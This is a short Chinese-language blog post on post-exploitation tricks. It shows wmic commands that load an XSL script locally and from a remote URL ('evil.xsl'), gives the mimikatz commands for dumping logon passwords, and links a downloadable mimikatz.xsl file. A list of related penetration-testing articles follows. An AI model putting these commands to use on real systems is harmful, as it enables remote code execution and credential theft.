wmic与mimikatz技巧

前言

wmic是比cmd强大的命令行。轻量级调试器神器mimikatz,后渗透常用。

测试wmic

使用wmic能够从本地或从URL调用XSL(可扩展样式表语言)脚本。

本地:
wmic process list /FORMAT:evil.xsl
远程:
wmic os get /FORMAT:"https://example.com/evil.xsl"

本地:

命令:

privilege::debug
sekurlsa::logonpasswords

密码账号:

远程:

OK

PowerShell

项目: https://github.com/caseysmithrc/XSLIdeas

总结:

emmmm,多关注墙外的知识。

mimikatz.xsl :

链接:https://pan.baidu.com/s/1rA5X4yQXprOME4cV-0TCaA 密码:4vcb

参考:

https://www.secpulse.com/archives/71380.html
https://www.t00ls.net/viewthread.php?tid=45774&extra=&page=1

渗透

相关

渗透测试(一)-Msf生成免杀后门(内网篇)

渗透测试(二)-Metasploit生成免杀后门(外网篇)

横向渗透

渗透测试之billu b0x2

DC3靶机渗透

DC3靶机渗透

域渗透之MS14-068域提权漏洞

[转载]IIS中间件渗透总结

IPv6渗透测试工具

渗透测试之劫持国外某云BucketName

内网渗透之巧用smb beacon拿下不出网主机

记一次靶场渗透记录

标签